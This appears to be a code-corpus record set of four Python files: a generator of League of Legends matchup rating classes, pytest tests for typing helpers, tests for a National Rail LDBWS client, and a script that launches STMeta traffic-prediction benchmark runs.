loldib/getratings/models/NA/na_hecarim/na_hecarim_jng.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_hecarim/na_hecarim_jng.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_hecarim/na_hecarim_jng.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings

# Every champion that can appear opposite Hecarim (NA, jungle) in the
# ratings dataset.  Adding a champion is now a one-word change instead of
# a new hand-written class statement.
_CHAMPIONS = (
    'Aatrox', 'Ahri', 'Akali', 'Alistar', 'Amumu', 'Anivia', 'Annie', 'Ashe',
    'AurelionSol', 'Azir', 'Bard', 'Blitzcrank', 'Brand', 'Braum', 'Caitlyn',
    'Camille', 'Cassiopeia', 'Chogath', 'Corki', 'Darius', 'Diana', 'Draven',
    'DrMundo', 'Ekko', 'Elise', 'Evelynn', 'Ezreal', 'Fiddlesticks', 'Fiora',
    'Fizz', 'Galio', 'Gangplank', 'Garen', 'Gnar', 'Gragas', 'Graves',
    'Hecarim', 'Heimerdinger', 'Illaoi', 'Irelia', 'Ivern', 'Janna',
    'JarvanIV', 'Jax', 'Jayce', 'Jhin', 'Jinx', 'Kalista', 'Karma',
    'Karthus', 'Kassadin', 'Katarina', 'Kayle', 'Kayn', 'Kennen', 'Khazix',
    'Kindred', 'Kled', 'KogMaw', 'Leblanc', 'LeeSin', 'Leona', 'Lissandra',
    'Lucian', 'Lulu', 'Lux', 'Malphite', 'Malzahar', 'Maokai', 'MasterYi',
    'MissFortune', 'MonkeyKing', 'Mordekaiser', 'Morgana', 'Nami', 'Nasus',
    'Nautilus', 'Nidalee', 'Nocturne', 'Nunu', 'Olaf', 'Orianna', 'Ornn',
    'Pantheon', 'Poppy', 'Quinn', 'Rakan', 'Rammus', 'RekSai', 'Renekton',
    'Rengar', 'Riven', 'Rumble', 'Ryze', 'Sejuani', 'Shaco', 'Shen',
    'Shyvana', 'Singed', 'Sion', 'Sivir', 'Skarner', 'Sona', 'Soraka',
    'Swain', 'Syndra', 'TahmKench', 'Taliyah', 'Talon', 'Taric', 'Teemo',
    'Thresh', 'Tristana', 'Trundle', 'Tryndamere', 'TwistedFate', 'Twitch',
    'Udyr', 'Urgot', 'Varus', 'Vayne', 'Veigar', 'Velkoz', 'Vi', 'Viktor',
    'Vladimir', 'Volibear', 'Warwick', 'Xayah', 'Xerath', 'XinZhao',
    'Yasuo', 'Yorick', 'Zac', 'Zed', 'Ziggs', 'Zilean', 'Zyra',
)

# Generate one empty Ratings subclass per champion, named
# NA_Hecarim_Jng_<Champion>, exactly as the previous ~140 hand-written
# `class NA_Hecarim_Jng_X(Ratings): pass` statements did.  Runtime imports
# (`from ... import NA_Hecarim_Jng_Ahri`) keep working because the classes
# are installed into this module's globals.
for _champion in _CHAMPIONS:
    _class_name = 'NA_Hecarim_Jng_' + _champion
    globals()[_class_name] = type(_class_name, (Ratings,), {})
del _champion, _class_name
| 16.026379
| 46
| 0.77151
| 972
| 6,683
| 4.878601
| 0.151235
| 0.203712
| 0.407423
| 0.494728
| 0.808941
| 0.808941
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166243
| 6,683
| 416
| 47
| 16.064904
| 0.851041
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
41c43c5d04dbd397cba7e1a133160b6364bf4e79
| 3,658
|
py
|
Python
|
tests/test_unit/test_type_utils.py
|
best-doctor/Mario
|
a6c83b9f7e7558a4e71d8acb00b8d164fe8eec6f
|
[
"MIT"
] | 12
|
2020-01-30T02:19:16.000Z
|
2022-01-20T04:00:43.000Z
|
tests/test_unit/test_type_utils.py
|
best-doctor/Mario
|
a6c83b9f7e7558a4e71d8acb00b8d164fe8eec6f
|
[
"MIT"
] | 32
|
2019-12-07T14:06:05.000Z
|
2020-06-26T07:12:03.000Z
|
tests/test_unit/test_type_utils.py
|
best-doctor/Mario
|
a6c83b9f7e7558a4e71d8acb00b8d164fe8eec6f
|
[
"MIT"
] | 3
|
2020-08-21T07:54:53.000Z
|
2021-01-11T12:05:48.000Z
|
import collections
from typing import List, Dict, Mapping, Iterable, Tuple, Set, Optional, Union
import pytest
from super_mario.utils.types import is_instance_of_type, is_instance_of_named_tuple
def test_is_instance_of_type_simple_types():
    """Concrete builtin types behave like a plain isinstance check."""
    matching = [(1, int), ('abc', str), ([1, 2], list), ({1: 2}, dict)]
    mismatched = [(1, str), ('abc', int), ([1, 2], dict), ({1: 2}, list)]
    for value, expected_type in matching:
        assert is_instance_of_type(value, expected_type)
    for value, wrong_type in mismatched:
        assert not is_instance_of_type(value, wrong_type)
def test_is_instance_of_type_basic_typing_types():
    """Bare (unparametrized) typing generics accept matching containers."""
    for value, typing_type in [([], List), ({}, Dict), ({}, Mapping), ([], Iterable)]:
        assert is_instance_of_type(value, typing_type)
    for value, typing_type in [([], Dict), ({}, List), ({}, Tuple), ([], Set)]:
        assert not is_instance_of_type(value, typing_type)
def test_is_instance_of_type_typing_list_with_simple_types():
    """Parametrized List[...] checks the container and every item type."""
    assert is_instance_of_type([1, 2, 3], List[int])
    for bad_value in ([1, 2, 3], [1, 2, '3'], {1: 2}):
        assert not is_instance_of_type(bad_value, List[str])
def test_is_instance_of_type_typing_dict_with_simple_types():
    """Parametrized Dict/Mapping validates key and value types separately."""
    sample = {1: '1', 2: '2'}
    assert is_instance_of_type(sample, Dict[int, str])
    assert is_instance_of_type(sample, Mapping[int, str])
    assert not is_instance_of_type(sample, Dict[str, str])   # wrong key type
    assert not is_instance_of_type(sample, Dict[int, int])   # wrong value type
    assert not is_instance_of_type([1, 2, 3, 4], Dict[int, int])  # not a dict
def test_is_instance_of_type_typing_with_optionals():
    """Optional[...] admits None at any nesting level, including keys/values."""
    accepted = [
        (1, Optional[int]),
        (None, Optional[int]),
        (None, Optional[List[int]]),
        ([], List[Optional[int]]),
        ([1, 2], List[Optional[int]]),
        ([1, 2, None], List[Optional[int]]),
        (None, Optional[Dict]),
        (None, Optional[Dict[str, Optional[int]]]),
        ({'a': 1, 'b': None}, Dict[str, Optional[int]]),
        ({1: 'a', None: 'b'}, Dict[Optional[int], str]),
    ]
    for value, typing_type in accepted:
        assert is_instance_of_type(value, typing_type)
    # The string 'None' is not None, so it must not satisfy Optional[int].
    assert not is_instance_of_type([1, 2, 'None'], List[Optional[int]])
def test_is_instance_of_type_typing_with_unions():
    """Union[...] matches when the value fits any of its alternatives."""
    accepted = [
        (1, Union[int]),
        (1, Union[int, str]),
        ('1', Union[int, str]),
        ([], Union[List, Dict]),
        ({}, Union[List, Dict]),
        ([], List[Union[int]]),
        ([1, 2], List[Union[int, str]]),
        ([1, '2'], List[Union[int, str]]),
        ({'a': 1, 'b': '2'}, Dict[str, Union[int, str]]),
        ({1: 'a', '2': 'b'}, Dict[Union[int, str], str]),
    ]
    rejected = [
        (set(), Union[List, Dict]),
        ([], Union[int, str]),
        ([1, '2', None], List[Union[int, str]]),
    ]
    for value, typing_type in accepted:
        assert is_instance_of_type(value, typing_type)
    for value, typing_type in rejected:
        assert not is_instance_of_type(value, typing_type)
@pytest.mark.parametrize(
    ('named_tuple', 'expected_result'),
    [
        # A real namedtuple instance is detected; plain tuples, strings and
        # lists are not.
        (collections.namedtuple('Test', 'a, b, c')(1, 2, 3), True),
        ((1, 2, 3), False),
        ('str', False),
        (['str'], False),
    ],
)
def test_is_instance_of_named_tuple(named_tuple, expected_result):
    """is_instance_of_named_tuple returns True only for namedtuple instances."""
    assert is_instance_of_named_tuple(named_tuple) == expected_result
| 38.914894
| 83
| 0.702843
| 597
| 3,658
| 3.946399
| 0.082077
| 0.250424
| 0.300509
| 0.380306
| 0.840407
| 0.816214
| 0.707555
| 0.654499
| 0.544992
| 0.289049
| 0
| 0.022272
| 0.153089
| 3,658
| 93
| 84
| 39.333333
| 0.738218
| 0
| 0
| 0
| 0
| 0
| 0.020503
| 0
| 0
| 0
| 0
| 0
| 0.714286
| 1
| 0.1
| false
| 0
| 0.057143
| 0
| 0.157143
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
68beee8640eed8e164e7e6630c62b422e7ddb650
| 17,547
|
py
|
Python
|
tests/test_ldbws_session.py
|
grundleborg/nrewebservices
|
f8416afad160366c70b0579c37aa11fb175ccac1
|
[
"BSD-2-Clause"
] | 15
|
2017-03-16T14:34:56.000Z
|
2021-09-18T23:27:03.000Z
|
tests/test_ldbws_session.py
|
grundleborg/nrewebservices
|
f8416afad160366c70b0579c37aa11fb175ccac1
|
[
"BSD-2-Clause"
] | 9
|
2016-09-09T13:43:32.000Z
|
2018-12-30T19:55:09.000Z
|
tests/test_ldbws_session.py
|
grundleborg/nrewebservices
|
f8416afad160366c70b0579c37aa11fb175ccac1
|
[
"BSD-2-Clause"
] | 3
|
2016-12-12T12:29:56.000Z
|
2018-06-03T22:44:51.000Z
|
import os
import sys

# Make the project root importable when the tests run from a plain checkout
# (this must happen before the `nrewebservices` import below).
testsPath = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, testsPath + '/../')

from suds import WebFault
import pytest

from nrewebservices.ldbws import Session

# Live National Rail LDBWS SOAP endpoint; the API version is pinned via the
# `ver` query parameter so upstream schema changes don't silently break tests.
API_URL = "https://lite.realtime.nationalrail.co.uk/OpenLDBWS/wsdl.aspx?ver=2016-02-16"
@pytest.fixture(scope="module")
def session():
    """One shared LDBWS Session for the whole module (talks to the live API)."""
    return Session(API_URL)
@pytest.mark.skipif(os.environ.get("NRE_LDBWS_API_KEY") is None,
reason="NRE_LDBWS_API_KEY must be set to test ldbws.Session class.")
class TestSession(object):
def test_get_station_board_arrivals(self, session):
    """An arrivals-only PAD board is returned with no filter applied."""
    board = session.get_station_board(
        "PAD", rows=10, include_departures=False, include_arrivals=True)
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name is None
    assert board.filter_crs is None
    assert board.filter_type is None
def test_get_station_board_departures(self, session):
    """A departures-only PAD board is returned with no filter applied."""
    board = session.get_station_board(
        "PAD", rows=10, include_departures=True, include_arrivals=False)
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name is None
    assert board.filter_crs is None
    assert board.filter_type is None
def test_get_station_board_arrivals_departures(self, session):
    """A combined arrivals+departures PAD board has no filter applied."""
    board = session.get_station_board(
        "PAD", rows=10, include_departures=True, include_arrivals=True)
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name is None
    assert board.filter_crs is None
    assert board.filter_type is None
def test_get_station_board_neither(self, session):
    """Requesting a board with neither arrivals nor departures raises."""
    with pytest.raises(ValueError):
        session.get_station_board(
            "PAD", rows=10, include_departures=False, include_arrivals=False)
def test_get_station_board_arrivals_filtered_from(self, session):
    """An arrivals board filtered from RDG reports the 'from' filter."""
    board = session.get_station_board(
        "PAD", rows=10, include_departures=False,
        include_arrivals=True, from_filter_crs="RDG")
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name == "Reading"
    assert board.filter_crs == "RDG"
    assert board.filter_type == "from"
def test_get_station_board_departures_filtered_from(self, session):
    """A departures board filtered from RDG reports the 'from' filter."""
    board = session.get_station_board(
        "PAD", rows=10, include_departures=True,
        include_arrivals=False, from_filter_crs="RDG")
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name == "Reading"
    assert board.filter_crs == "RDG"
    assert board.filter_type == "from"
def test_get_station_board_arrivals_departures_filtered_from(self, session):
    """A combined board filtered from RDG reports the 'from' filter."""
    board = session.get_station_board(
        "PAD", rows=10, include_departures=True,
        include_arrivals=True, from_filter_crs="RDG")
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name == "Reading"
    assert board.filter_crs == "RDG"
    assert board.filter_type == "from"
@pytest.mark.xfail
def test_get_station_board_arrivals_filtered_to(self, session):
    """An arrivals board filtered to RDG should report the 'to' filter."""
    board = session.get_station_board(
        "PAD", rows=10, include_departures=False,
        include_arrivals=True, to_filter_crs="RDG")
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name == "Reading"
    assert board.filter_crs == "RDG"
    # TODO: Investigate why the service reports filter_type as None, not "to".
    assert board.filter_type == "to"
@pytest.mark.xfail
def test_get_station_board_departures_filtered_to(self, session):
    """A departures board filtered to RDG should report the 'to' filter."""
    board = session.get_station_board(
        "PAD", rows=10, include_departures=True,
        include_arrivals=False, to_filter_crs="RDG")
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name == "Reading"
    assert board.filter_crs == "RDG"
    # TODO: Investigate why the service reports filter_type as None, not "to".
    assert board.filter_type == "to"
@pytest.mark.xfail
def test_get_station_board_arrivals_departures_filtered_to(self, session):
    """A combined board filtered to RDG should report the 'to' filter."""
    board = session.get_station_board(
        "PAD", rows=10, include_departures=True,
        include_arrivals=True, to_filter_crs="RDG")
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name == "Reading"
    assert board.filter_crs == "RDG"
    # TODO: Investigate why the service reports filter_type as None, not "to".
    assert board.filter_type == "to"
@pytest.mark.xfail
def test_get_station_board_arrivals_filtered_both_filters(self, session):
    """With both filters given, the 'to' filter should take precedence."""
    board = session.get_station_board(
        "PAD", rows=10, include_departures=False,
        include_arrivals=True, from_filter_crs="RDG", to_filter_crs="RDG")
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name == "Reading"
    assert board.filter_crs == "RDG"
    # TODO: Investigate why the service reports filter_type as None, not "to".
    assert board.filter_type == "to"
### NEXT ###
def test_get_station_board_with_details_arrivals(self, session):
    """An arrivals-only detailed PAD board comes back unfiltered."""
    board = session.get_station_board_with_details(
        "PAD", rows=10, include_departures=False, include_arrivals=True)
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name is None
    assert board.filter_crs is None
    assert board.filter_type is None
def test_get_station_board_with_details_departures(self, session):
    """A departures-only detailed PAD board comes back unfiltered."""
    board = session.get_station_board_with_details(
        "PAD", rows=10, include_departures=True, include_arrivals=False)
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name is None
    assert board.filter_crs is None
    assert board.filter_type is None
def test_get_station_board_with_details_arrivals_departures(self, session):
    """A combined detailed PAD board comes back unfiltered."""
    board = session.get_station_board_with_details(
        "PAD", rows=10, include_departures=True, include_arrivals=True)
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name is None
    assert board.filter_crs is None
    assert board.filter_type is None
def test_get_station_board_with_details_neither(self, session):
    """A detailed board with neither arrivals nor departures raises."""
    with pytest.raises(ValueError):
        session.get_station_board_with_details(
            "PAD", rows=10, include_departures=False, include_arrivals=False)
def test_get_station_board_arrivals_with_details_filtered_from(self, session):
    """A detailed arrivals board filtered from RDG reports the 'from' filter."""
    board = session.get_station_board_with_details(
        "PAD", rows=10, include_departures=False,
        include_arrivals=True, from_filter_crs="RDG")
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name == "Reading"
    assert board.filter_crs == "RDG"
    assert board.filter_type == "from"
def test_get_station_board_departures_with_details_filtered_from(self, session):
    """A detailed departures board filtered from RDG reports the 'from' filter."""
    board = session.get_station_board_with_details(
        "PAD", rows=10, include_departures=True,
        include_arrivals=False, from_filter_crs="RDG")
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name == "Reading"
    assert board.filter_crs == "RDG"
    assert board.filter_type == "from"
def test_get_station_board_arrivals_departures_with_details_filtered_from(self, session):
    """A detailed combined board filtered from RDG reports the 'from' filter."""
    board = session.get_station_board_with_details(
        "PAD", rows=10, include_departures=True,
        include_arrivals=True, from_filter_crs="RDG")
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name == "Reading"
    assert board.filter_crs == "RDG"
    assert board.filter_type == "from"
@pytest.mark.xfail
def test_get_station_board_arrivals_with_details_filtered_to(self, session):
    """A detailed arrivals board filtered to RDG should report 'to'."""
    board = session.get_station_board_with_details(
        "PAD", rows=10, include_departures=False,
        include_arrivals=True, to_filter_crs="RDG")
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name == "Reading"
    assert board.filter_crs == "RDG"
    # TODO: Investigate why the service reports filter_type as None, not "to".
    assert board.filter_type == "to"
@pytest.mark.xfail
def test_get_station_board_departures_with_details_filtered_to(self, session):
    """A detailed departures board filtered to RDG should report 'to'."""
    board = session.get_station_board_with_details(
        "PAD", rows=10, include_departures=True,
        include_arrivals=False, to_filter_crs="RDG")
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name == "Reading"
    assert board.filter_crs == "RDG"
    # TODO: Investigate why the service reports filter_type as None, not "to".
    assert board.filter_type == "to"
@pytest.mark.xfail
def test_get_station_board_arrivals_departures_with_details_filtered_to(self, session):
    """A detailed combined board filtered to RDG should report 'to'."""
    board = session.get_station_board_with_details(
        "PAD", rows=10, include_departures=True,
        include_arrivals=True, to_filter_crs="RDG")
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name == "Reading"
    assert board.filter_crs == "RDG"
    # TODO: Investigate why the service reports filter_type as None, not "to".
    assert board.filter_type == "to"
@pytest.mark.xfail
def test_get_station_board_arrivals_with_details_filtered_both_filters(self, session):
    """With both filters on a detailed board, 'to' should take precedence."""
    board = session.get_station_board_with_details(
        "PAD", rows=10, include_departures=False,
        include_arrivals=True, from_filter_crs="RDG", to_filter_crs="RDG")
    assert board.location_name == "London Paddington"
    assert board.crs == "PAD"
    assert board.filter_location_name == "Reading"
    assert board.filter_crs == "RDG"
    # TODO: Investigate why the service reports filter_type as None, not "to".
    assert board.filter_type == "to"
def test_get_next_departures_basic(self, session):
    # A plain next-departures query: no station filter is applied, and one
    # departure entry comes back per requested destination, in order.
    board = session.get_next_departures("PAD", ["RDG", "TWY"])
    assert (board.location_name, board.crs) == ("London Paddington", "PAD")
    assert board.filter_location_name is None
    assert board.filter_crs is None
    assert board.filter_type is None
    assert [dep.crs for dep in board.next_departures] == ["RDG", "TWY"]
def test_get_next_departures_not_a_list(self, session):
    # A bare CRS string instead of a list of codes must be rejected.
    with pytest.raises(ValueError):
        session.get_next_departures("PAD", "RDG")
def test_get_next_departures_too_few(self, session):
    # An empty destination list must be rejected.
    with pytest.raises(ValueError):
        session.get_next_departures("PAD", [])
def test_get_next_departures_too_many(self, session):
    # More destinations than the API allows must be rejected.
    too_many_crs = ["RDG", "TWY", "PLY", "PNZ", "WAT", "WIN", "BRI", "STP",
                    "LEI", "MIM", "OXF", "CBG", "ABY", "STS", "LSK", "CSK",
                    "GSL", "CLJ", "WIJ", "WAT", "MKC", "BIR", "BMS", "BSH",
                    "MYB", "OPY"]
    with pytest.raises(ValueError):
        session.get_next_departures("PAD", too_many_crs)
def test_get_next_departures_repeated(self, session):
    # Duplicate destinations are allowed and produce one entry each,
    # preserving request order.
    board = session.get_next_departures("PAD", ["RDG", "TWY", "RDG"])
    assert (board.location_name, board.crs) == ("London Paddington", "PAD")
    assert board.filter_location_name is None
    assert board.filter_crs is None
    assert board.filter_type is None
    assert [dep.crs for dep in board.next_departures] == ["RDG", "TWY", "RDG"]
def test_get_next_departures_with_details_basic(self, session):
    # Detailed variant of the basic next-departures query: same board
    # metadata contract, one entry per destination in request order.
    board = session.get_next_departures_with_details("PAD", ["RDG", "TWY"])
    assert (board.location_name, board.crs) == ("London Paddington", "PAD")
    assert board.filter_location_name is None
    assert board.filter_crs is None
    assert board.filter_type is None
    assert [dep.crs for dep in board.next_departures] == ["RDG", "TWY"]
def test_get_next_departures_with_details_not_a_list(self, session):
    # A bare CRS string instead of a list of codes must be rejected.
    with pytest.raises(ValueError):
        session.get_next_departures_with_details("PAD", "RDG")
def test_get_next_departures_with_details_too_few(self, session):
    # An empty destination list must be rejected.
    with pytest.raises(ValueError):
        session.get_next_departures_with_details("PAD", [])
def test_get_next_departures_with_details_too_many(self, session):
    # More destinations than the API allows must be rejected.
    too_many_crs = ["RDG", "TWY", "PLY", "PNZ", "WAT", "WIN", "BRI", "STP",
                    "LEI", "MIM", "OXF", "CBG", "ABY", "STS", "LSK", "CSK",
                    "GSL", "CLJ", "WIJ", "WAT", "MKC", "BIR", "BMS", "BSH",
                    "MYB", "OPY"]
    with pytest.raises(ValueError):
        session.get_next_departures_with_details("PAD", too_many_crs)
def test_get_next_departures_with_details_repeated(self, session):
    # Duplicate destinations are allowed in the detailed variant too.
    board = session.get_next_departures_with_details("PAD", ["RDG", "TWY", "RDG"])
    assert (board.location_name, board.crs) == ("London Paddington", "PAD")
    assert board.filter_location_name is None
    assert board.filter_crs is None
    assert board.filter_type is None
    assert [dep.crs for dep in board.next_departures] == ["RDG", "TWY", "RDG"]
def test_get_fastest_departures_basic(self, session):
    # Fastest-departures query: same board contract as next-departures,
    # one entry per requested destination in request order.
    board = session.get_fastest_departures("PAD", ["RDG", "TWY"])
    assert (board.location_name, board.crs) == ("London Paddington", "PAD")
    assert board.filter_location_name is None
    assert board.filter_crs is None
    assert board.filter_type is None
    assert [dep.crs for dep in board.next_departures] == ["RDG", "TWY"]
def test_get_fastest_departures_not_a_list(self, session):
    # A bare CRS string instead of a list of codes must be rejected.
    with pytest.raises(ValueError):
        session.get_fastest_departures("PAD", "RDG")
def test_get_fastest_departures_too_few(self, session):
    # An empty destination list must be rejected.
    with pytest.raises(ValueError):
        session.get_fastest_departures("PAD", [])
def test_get_fastest_departures_too_many(self, session):
    # More destinations than the API allows must be rejected.
    too_many_crs = ["RDG", "TWY", "PLY", "PNZ", "WAT", "WIN", "BRI", "STP",
                    "LEI", "MIM", "OXF", "CBG", "ABY", "STS", "LSK", "CSK",
                    "GSL", "CLJ", "WIJ", "WAT", "MKC", "BIR", "BMS", "BSH",
                    "MYB", "OPY"]
    with pytest.raises(ValueError):
        session.get_fastest_departures("PAD", too_many_crs)
def test_get_fastest_departures_repeated(self, session):
    """Duplicate destination CRS codes are allowed and come back in order.

    Renamed from ``test_get_next_fastestrtures_repeated`` (a typo) so the
    name matches the ``test_get_fastest_departures_*`` scheme used by the
    surrounding fastest-departures tests.
    """
    r = session.get_fastest_departures("PAD", ["RDG", "TWY", "RDG"])
    assert r.location_name == "London Paddington"
    assert r.crs == "PAD"
    assert r.filter_location_name is None
    assert r.filter_crs is None
    assert r.filter_type is None
    assert len(r.next_departures) == 3
    assert r.next_departures[0].crs == "RDG"
    assert r.next_departures[1].crs == "TWY"
    assert r.next_departures[2].crs == "RDG"
def test_get_fastest_departures_with_details_basic(self, session):
    # Detailed fastest-departures query: same board metadata contract,
    # one entry per destination in request order.
    board = session.get_fastest_departures_with_details("PAD", ["RDG", "TWY"])
    assert (board.location_name, board.crs) == ("London Paddington", "PAD")
    assert board.filter_location_name is None
    assert board.filter_crs is None
    assert board.filter_type is None
    assert [dep.crs for dep in board.next_departures] == ["RDG", "TWY"]
def test_get_fastest_departures_with_details_not_a_list(self, session):
    # A bare CRS string instead of a list of codes must be rejected.
    with pytest.raises(ValueError):
        session.get_fastest_departures_with_details("PAD", "RDG")
def test_get_fastest_departures_with_details_too_few(self, session):
    # An empty destination list must be rejected.
    with pytest.raises(ValueError):
        session.get_fastest_departures_with_details("PAD", [])
def test_get_fastest_departures_with_details_too_many(self, session):
    # More destinations than the API allows must be rejected.
    too_many_crs = ["RDG", "TWY", "PLY", "PNZ", "WAT", "WIN", "BRI", "STP",
                    "LEI", "MIM", "OXF", "CBG", "ABY", "STS", "LSK", "CSK",
                    "GSL", "CLJ", "WIJ", "WAT", "MKC", "BIR", "BMS", "BSH",
                    "MYB", "OPY"]
    with pytest.raises(ValueError):
        session.get_fastest_departures_with_details("PAD", too_many_crs)
def test_get_fastest_departures_with_details_repeated(self, session):
    # Duplicate destinations are allowed in the detailed variant too.
    board = session.get_fastest_departures_with_details("PAD", ["RDG", "TWY", "RDG"])
    assert (board.location_name, board.crs) == ("London Paddington", "PAD")
    assert board.filter_location_name is None
    assert board.filter_crs is None
    assert board.filter_type is None
    assert [dep.crs for dep in board.next_departures] == ["RDG", "TWY", "RDG"]
def test_get_service(self, session):
    # Fetch a live departures board, then look up full details for the
    # first service on it; the details should reference the same station.
    board = session.get_station_board("LBG", include_departures=True, include_arrivals=False)
    assert board.train_services
    details = session.get_service_details(board.train_services[0].service_id)
    assert details.crs == "LBG"
def test_get_service_invalid_id(self, session):
    # A malformed service id currently surfaces as a raw SUDS WebFault.
    # TODO: Wrap up SUDS errors in something more helpful in the API.
    with pytest.raises(WebFault):
        session.get_service_details("lalalalala")
| 42.384058
| 250
| 0.663418
| 2,355
| 17,547
| 4.659023
| 0.060722
| 0.102078
| 0.099526
| 0.050219
| 0.945133
| 0.9393
| 0.93447
| 0.922712
| 0.909861
| 0.900201
| 0
| 0.006075
| 0.221405
| 17,547
| 413
| 251
| 42.486683
| 0.797028
| 0.028096
| 0
| 0.707396
| 0
| 0.003215
| 0.090045
| 0
| 0
| 0
| 0
| 0.002421
| 0.546624
| 1
| 0.144695
| false
| 0
| 0.019293
| 0.003215
| 0.170418
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
68bf722715551c9c887897220a7705dce3de5ca9
| 5,890
|
py
|
Python
|
Experiments/STMeta/deprecated/Runner_supplement_external_30.py
|
TempAnonymous/Context_Analysis
|
bbeba1ed7ea7001c22a12721fc4f390d4cc01a6e
|
[
"MIT"
] | 3
|
2021-06-29T06:18:18.000Z
|
2021-09-07T03:11:35.000Z
|
Experiments/STMeta/deprecated/Runner_supplement_external_30.py
|
TempAnonymous/Context_Analysis
|
bbeba1ed7ea7001c22a12721fc4f390d4cc01a6e
|
[
"MIT"
] | null | null | null |
Experiments/STMeta/deprecated/Runner_supplement_external_30.py
|
TempAnonymous/Context_Analysis
|
bbeba1ed7ea7001c22a12721fc4f390d4cc01a6e
|
[
"MIT"
] | null | null | null |
"""Run the STMeta external-feature benchmark sweep (24 runs).

Each run invokes STMeta_Obj.py for one (external_method, dataset) pair.
The command strings are identical to the original hand-unrolled script,
emitted in the same order: for each method group, the four datasets
bike_chicago, didi_chengdu, metro_shanghai, chargestation_beijing.
"""
import os
import warnings

warnings.filterwarnings("ignore")

# (dataset yaml, graph specification, MergeIndex) -- one entry per city.
_DATASETS = [
    ("bike_chicago.data.yml", "Distance-Correlation-Interaction", 6),
    ("didi_chengdu.data.yml", "Distance-Correlation-Interaction", 6),
    ("metro_shanghai.data.yml", "Distance-Correlation-Line", 6),
    ("chargestation_beijing.data.yml", "Distance-Correlation", 1),
]

# (extra -p prefix, external_method, mark) -- one entry per benchmark group,
# in the original run order.  The lstm groups additionally pass
# external_lstm_len:4, and their mark embeds that length ("lstm4_...").
_METHODS = [
    ("", "emb-linear-add", "emb_linear_add"),
    ("", "emb-linear-gating", "emb_linear_gating"),
    ("", "multi-linear-add", "multi_linear_add"),
    ("", "multi-linear-gating", "multi_linear_gating"),
    ("external_lstm_len:4,", "lstm-not-concat", "lstm4_not_concat"),
    ("external_lstm_len:4,", "lstm-linear-gating", "lstm4_linear_gating"),
]


def build_commands():
    """Return the 24 benchmark shell commands, in run order."""
    commands = []
    for prefix, method, mark in _METHODS:
        for data_yml, graph, merge_index in _DATASETS:
            commands.append(
                'python STMeta_Obj.py -m STMeta_v1.model.yml -d %s '
                '-p %sexternal_method:%s,graph:%s,mark:%s,MergeIndex:%d'
                % (data_yml, prefix, method, graph, mark, merge_index)
            )
    return commands


if __name__ == "__main__":
    for command in build_commands():
        os.system(command)
| 55.046729
| 147
| 0.707131
| 825
| 5,890
| 4.854545
| 0.058182
| 0.080899
| 0.083895
| 0.11985
| 0.976779
| 0.93608
| 0.9201
| 0.915106
| 0.915106
| 0.915106
| 0
| 0.011936
| 0.089643
| 5,890
| 106
| 148
| 55.566038
| 0.734987
| 0.027844
| 0
| 0.705882
| 0
| 0.470588
| 0.853833
| 0.616335
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.039216
| 0
| 0.039216
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
